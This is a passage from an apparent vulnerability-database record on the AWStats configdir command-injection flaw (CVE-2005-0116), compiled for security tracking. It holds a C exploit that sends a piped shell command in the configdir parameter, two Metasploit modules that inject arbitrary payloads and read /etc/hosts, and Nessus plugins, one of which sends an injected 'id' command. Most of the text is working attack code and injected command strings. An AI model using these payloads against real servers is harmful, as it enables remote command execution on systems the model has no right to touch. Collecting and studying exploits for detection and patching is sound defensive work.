strlen(inC); i++){\r\nc = retval[i];\r\nif( 'a' <= c && c <= 'z'\r\n|| 'A' <= c && c <= 'Z'\r\n|| '0' <= c && c <= '9'\r\n|| c == '-' || c == '_' || c == '.')\r\nres[j++] = c;\r\nelse {\r\nres[j++] = '%';\r\nres[j++] = h[c >> 4];\r\nres[j++] = h[c & 0x0f];\r\n}\r\n}\r\nreturn res;\r\n\r\n}\r\n\r\n\r\nchar *buildHeader(char *Xhost, char *Xpath,char *Xscript, char *exeCmd)\r\n{\r\nchar Header[5196];\r\n\r\nsprintf( Header,\r\n\"GET %s/%s?configdir=%s HTTP/1.1\\r\\n\"\r\n\"Accept: 
text/xml,application/xml,application/xhtml+xml,\"\r\n\"text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,\"\r\n\"image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\\r\\n\"\r\n\"Accept-Language: en-us\\r\\n\"\r\n\"Accept-Encoding: deflate, gzip\\r\\n\"\r\n\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)\\r\\n\"\r\n\"Host: %s\\r\\n\"\r\n\"Connection: Keep-Alive\\r\\n\"\r\n\"Cache-Control: no-cache\\r\\n\"\r\n\"\\r\\n\"\r\n, Xpath, Xscript, urlEncode(exeCmd), Xhost );\r\nreturn Header;\r\n}\r\n\r\n\r\nvoid exploit(char *Xhost, char *Xpath,char *Xscript, char *exeCmd, char *Xip, int Xport)\r\n{\r\nint sock, disp = 0, count = 0;\r\nstruct sockaddr_in sockaddrX;\r\nchar *oData, iData;\r\n\r\nprintf(\"# AWStats Exploit by Thunder, molnar_rcs@yahoo.com\\n\");\r\nsockaddrX.sin_port = htons(Xport);\r\nsockaddrX.sin_family = AF_INET;\r\nsockaddrX.sin_addr.s_addr = inet_addr(Xip);\r\nif(Xhost == \"localhost\")\r\n{\r\nprintf(\"# Using hardcoded (default) options, use `-u` for usage\\n\"\r\n);\r\n}\r\nprintf(\"# Connecting to %s (%s) ...\", Xhost, Xip);\r\nsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\nif (connect(sock, (struct sockaddr*)&sockaddrX, 16) < 0)\r\n{\r\nprintf(\"\\n# Connect to %s (%s) on port %i failed!\\n\", Xhost, Xip, Xport);\r\nexit(-1);\r\n}\r\nprintf(\"Done!\\n# Building header...\");\r\noData = buildHeader(Xhost, Xpath, Xscript, exeCmd);\r\nprintf(\"Done!\\n# Sending data...\");\r\nsend(sock, oData, strlen(oData), 0);\r\n\r\n/* the code below reads the server response byte by byte, this is not needed\r\nwhile(read(sock, &iData, 1))\r\nputchar(iData);\r\n*/\r\nprintf(\"Done!\\n# Exploit finished.\\n\");\r\nclose(sock);\r\n}\r\n\r\n\r\n\r\n\r\n\r\nint main(int argc, char * argv[])\r\n{\r\nextern char *optarg;\r\nextern int optind, optopt;\r\n\r\nint c,\r\nXport = 80,\r\nisgood = 0;\r\n\r\nchar *Xhost = \"localhost\" ,\r\n*Xip = \"127.0.0.1\",\r\n*Xscript = \"awstats.pl\",\r\n*Xpath = \"/cgi-bin\";\r\n\r\nchar 
exeCmd[1024] = \"| echo \\\"You have been Owned, update AWstat or patch\\\" > /tmp/OWNED | \";\r\n\r\nwhile ((c = getopt(argc, argv, \":uh:i:s:p:c:o:\")) != -1)\r\n{\r\n\r\nswitch(c)\r\n{\r\ncase 'h':\r\nXhost = optarg;\r\nisgood++;\r\nbreak;\r\n\r\ncase 'i':\r\nXip = optarg;\r\nisgood++;\r\nbreak;\r\n\r\ncase 's':\r\nXscript = optarg;\r\nbreak;\r\n\r\ncase 'p':\r\nXpath = optarg;\r\nbreak;\r\n\r\ncase 'c':\r\nif(strlen(optarg) > 1018)\r\n{\r\nprintf(\"# `-c` argument can't exceed 1024 bytes (command to long)\");\r\nexit(0);\r\n}\r\nsprintf(exeCmd, \" | %s | \", optarg);\r\nbreak;\r\n\r\ncase 'o':\r\nXport = atoi(optarg);\r\nbreak;\r\n\r\ncase 'u':\r\nusage(argv[0]);\r\nbreak;\r\n\r\ncase '?':\r\nprintf(\"# Unknown option `-%c`\\n\", optopt);\r\nbreak;\r\n\r\n\r\n}\r\n}\r\n\r\n\r\nif( isgood == 1)\r\n{\r\nprintf(\"# Please specify both host `-h` and ip `-i`\\n\");\r\nexit(0);\r\n}\r\n\r\nexploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport);\r\nreturn 0;\r\n}\r\n\r\n// milw0rm.com [2005-01-25]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/772/"}, {"lastseen": "2016-02-02T06:47:26", "description": "AWStats configdir Remote Command Execution. CVE-2005-0116. Webapps exploit for cgi platform", "published": "2009-12-26T00:00:00", "type": "exploitdb", "title": "AWStats 6.1-6.2 configdir Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2009-12-26T00:00:00", "id": "EDB-ID:16905", "href": "https://www.exploit-db.com/exploits/16905/", "sourceData": "##\r\n# $Id: awstats_configdir_exec.rb 7970 2009-12-26 03:31:20Z hdm $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'AWStats configdir Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\r\n\t\t\t\t\tAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\r\n\t\t\t\t\tare vulnerable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 7970 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2005-0116'],\r\n\t\t\t\t\t['OSVDB', '13002'],\r\n\t\t\t\t\t['BID', '12298'],\r\n\t\t\t\t\t['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Jan 15 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [true, \"The full URI path to awstats.pl\", \"/cgi-bin/awstats.pl\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => datastore['URI'],\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'configdir' => '|echo;cat /etc/hosts;echo|'\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res and 
res.body.match(/localhost/))\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tcommand = Rex::Text.uri_encode(payload.encoded)\r\n\t\turlconfigdir = datastore['URI'] + \"?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|\"\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => urlconfigdir,\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\r\n\t\t\t\t'Connection' => 'Close',\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res)\r\n\t\t\tprint_status(\"The server returned: #{res.code} #{res.message}\")\r\n\r\n\t\t\tm = res.body.match(/YYY\\n(.*)\\nYYY/m)\r\n\r\n\t\t\tif (m)\r\n\t\t\t\tprint_status(\"Command output from the server:\")\r\n\t\t\t\tprint(\"\\n\" + m[1] + \"\\n\\n\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"This server may not be vulnerable\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16905/"}, {"lastseen": "2016-02-01T11:30:49", "description": "AWStats 6.2-6.1 configdir Command Injection. CVE-2005-0116. Webapps exploit for cgi platform", "published": "2005-01-15T00:00:00", "type": "exploitdb", "title": "AWStats 6.2-6.1 - configdir Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2005-01-15T00:00:00", "id": "EDB-ID:9912", "href": "https://www.exploit-db.com/exploits/9912/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'AWStats configdir Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\r\n\t\t\t\t\tAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\r\n\t\t\t\t\tare vulnerable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2005-0116'],\r\n\t\t\t\t\t['OSVDB', '13002'],\r\n\t\t\t\t\t['BID', '12298'],\r\n\t\t\t\t\t['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\t\t\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Jan 15 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [true, \"The full URI path to awstats.pl\", \"/cgi-bin/awstats.pl\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => datastore['URI'],\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'configdir' => '|echo;cat /etc/hosts;echo|'\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res and 
res.body.match(/localhost/))\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tcommand = Rex::Text.uri_encode(payload.encoded)\r\n\t\turlconfigdir = datastore['URI'] + \"?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|\"\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => urlconfigdir,\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\r\n\t\t\t\t'Connection' => 'Close',\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res)\r\n\t\t\tprint_status(\"The server returned: #{res.code} #{res.message}\")\r\n\r\n\t\t\tm = res.body.match(/YYY\\n(.*)\\nYYY/m)\r\n\r\n\t\t\tif (m)\r\n\t\t\t\tprint_status(\"Command output from the server:\")\r\n\t\t\t\tprint(\"\\n\" + m[1] + \"\\n\\n\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"This server may not be vulnerable\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9912/"}], "nessus": [{"lastseen": "2021-01-07T10:39:51", "description": "An iDEFENSE Security Advisory reports :\n\nRemote exploitation of an input validation vulnerability in AWStats\nallows attackers to execute arbitrary commands under the privileges of\nthe web server.\n\nThe problem specifically exists when the application is running as a\nCGI script on a web server. The 'configdir' parameter contains\nunfiltered user-supplied data that is utilized in a call to the Perl\nroutine open()...\n\nSuccessful exploitation allows remote attackers to execute arbitrary\ncommands under the privileges of the web server. 
This can lead to\nfurther compromise as it provides remote attackers with local access.", "edition": 27, "published": "2005-07-13T00:00:00", "title": "FreeBSD : awstats -- remote command execution vulnerability (0f5a2b4d-694b-11d9-a9e7-0001020eed82)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:awstats"], "id": "FREEBSD_PKG_0F5A2B4D694B11D9A9E70001020EED82.NASL", "href": "https://www.tenable.com/plugins/nessus/18840", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18840);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-0116\");\n script_bugtraq_id(12270);\n script_xref(name:\"CERT\", value:\"272296\");\n\n script_name(english:\"FreeBSD : awstats -- remote command execution vulnerability (0f5a2b4d-694b-11d9-a9e7-0001020eed82)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An iDEFENSE Security Advisory reports :\n\nRemote exploitation of an input validation vulnerability in AWStats\nallows attackers to execute arbitrary commands under the privileges of\nthe web server.\n\nThe problem specifically exists when the application is running as a\nCGI script on a web server. The 'configdir' parameter contains\nunfiltered user-supplied data that is utilized in a call to the Perl\nroutine open()...\n\nSuccessful exploitation allows remote attackers to execute arbitrary\ncommands under the privileges of the web server. 
This can lead to\nfurther compromise as it provides remote attackers with local access.\"\n );\n # http://marc.theaimsgroup.com/?l=full-disclosure&m=110600949323439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=full-disclosure&m=110600949323439\"\n );\n # http://awstats.sourceforge.net/docs/awstats_changelog.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://awstats.sourceforge.io/docs/awstats_changelog.txt\"\n );\n # http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?020e4b8e\"\n );\n # https://vuxml.freebsd.org/freebsd/0f5a2b4d-694b-11d9-a9e7-0001020eed82.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?77ccfd06\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AWStats configdir Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:awstats\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"awstats<6.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T09:25:08", "description": "The remote host is running AWStats, a free logfile analysis tool for\nanalyzing ftp, mail, web, ... traffic. \n\nThe remote version of this software fails to sanitize user-supplied\ninput to the 'configdir' parameter of the 'awstats.pl' script. 
An\nattacker may exploit this condition to execute commands remotely or\ndisclose contents of files, subject to the privileges under which the\nweb server operates.", "edition": 20, "published": "2005-01-18T00:00:00", "title": "AWStats awstats.pl configdir Parameter Arbitrary Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116"], "modified": "2005-01-18T00:00:00", "cpe": ["cpe:/a:laurent_destailleur:awstats"], "id": "AWSTATS_CONFIGDIR.NASL", "href": "https://www.tenable.com/plugins/nessus/16189", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16189);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2005-0116\");\n script_bugtraq_id(12270, 12298);\n\n script_name(english:\"AWStats awstats.pl configdir Parameter Arbitrary Command Execution\");\n script_summary(english:\"Determines the presence of AWStats awstats.pl flaws\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a CGI script that allows execution of\narbitrary commands.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running AWStats, a free logfile analysis tool for\nanalyzing ftp, mail, web, ... traffic. \n\nThe remote version of this software fails to sanitize user-supplied\ninput to the 'configdir' parameter of the 'awstats.pl' script. 
An\nattacker may exploit this condition to execute commands remotely or\ndisclose contents of files, subject to the privileges under which the\nweb server operates.\");\n # http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=185\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2210a10f\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.awstats.org/docs/awstats_changelog.txt\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to AWStats version 6.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AWStats configdir Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:laurent_destailleur:awstats\");\n script_end_attributes();\n \n script_category(ACT_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n \n script_dependencies(\"awstats_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/AWStats\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = 
get_http_port(default:80, embedded:TRUE);\nif ( ! port ) exit(0, \"Port \"+port+\" is closed\");\nif (get_kb_item(\"Services/www/\"+port+\"/embedded\")) exit(0, \"The web server on port \"+port+\" is embedded.\");\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/AWStats\"));\nif (isnull(install)) exit(0, \"AWStats was not detected on port \"+port);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\n\nif (!isnull(matches))\n{ \n dir = matches[2];\n http_check_remote_code_ka (\n\t\t\textra_dirs:make_list(dir),\n\t\t\textra_check:\"Check config file, permissions and AWStats documentation\",\n\t\t\tcheck_request:\"/awstats.pl?configdir=|echo%20Content-Type:%20text/html;%20echo%20;id|%00\",\n\t\t\tcheck_result:\"uid=[0-9]+.*gid=[0-9]+.*\",\n\t\t\tcommand:\"id\" );\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:54", "description": "The remote host is affected by the vulnerability described in GLSA-200501-36\n(AWStats: Remote code execution)\n\n When 'awstats.pl' is run as a CGI script, it fails to validate specific\n inputs which are used in a Perl open() function call. Furthermore, a\n user could read log file content even when plugin rawlog was not\n enabled.\n \nImpact :\n\n A remote attacker could supply AWStats malicious input, potentially\n allowing the execution of arbitrary code with the rights of the web\n server. 
He could also access raw log contents.\n \nWorkaround :\n\n Making sure that AWStats does not run as a CGI script will avoid the\n issue, but we recommend that users upgrade to the latest version, which\n fixes these bugs.", "edition": 26, "published": "2005-02-14T00:00:00", "title": "GLSA-200501-36 : AWStats: Remote code execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0362", "CVE-2005-0116", "CVE-2005-0363"], "modified": "2005-02-14T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:awstats", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200501-36.NASL", "href": "https://www.tenable.com/plugins/nessus/16427", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200501-36.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16427);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-0116\", \"CVE-2005-0362\", \"CVE-2005-0363\");\n script_xref(name:\"GLSA\", value:\"200501-36\");\n\n script_name(english:\"GLSA-200501-36 : AWStats: Remote code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200501-36\n(AWStats: Remote code execution)\n\n When 'awstats.pl' is run as a CGI script, it fails to validate specific\n inputs which are used in a Perl open() function call. Furthermore, a\n user could read log file content even when plugin rawlog was not\n enabled.\n \nImpact :\n\n A remote attacker could supply AWStats malicious input, potentially\n allowing the execution of arbitrary code with the rights of the web\n server. 
He could also access raw log contents.\n \nWorkaround :\n\n Making sure that AWStats does not run as a CGI script will avoid the\n issue, but we recommend that users upgrade to the latest version, which\n fixes these bugs.\"\n );\n # http://awstats.sourceforge.net/docs/awstats_changelog.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://awstats.sourceforge.io/docs/awstats_changelog.txt\"\n );\n # http://www.idefense.com/application/poi/display?id=185\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?020e4b8e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200501-36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All AWStats users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-misc/awstats-6.3-r2'\n Note: Users with the vhosts USE flag set should manually use\n webapp-config to finalize the update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AWStats configdir Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:awstats\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script 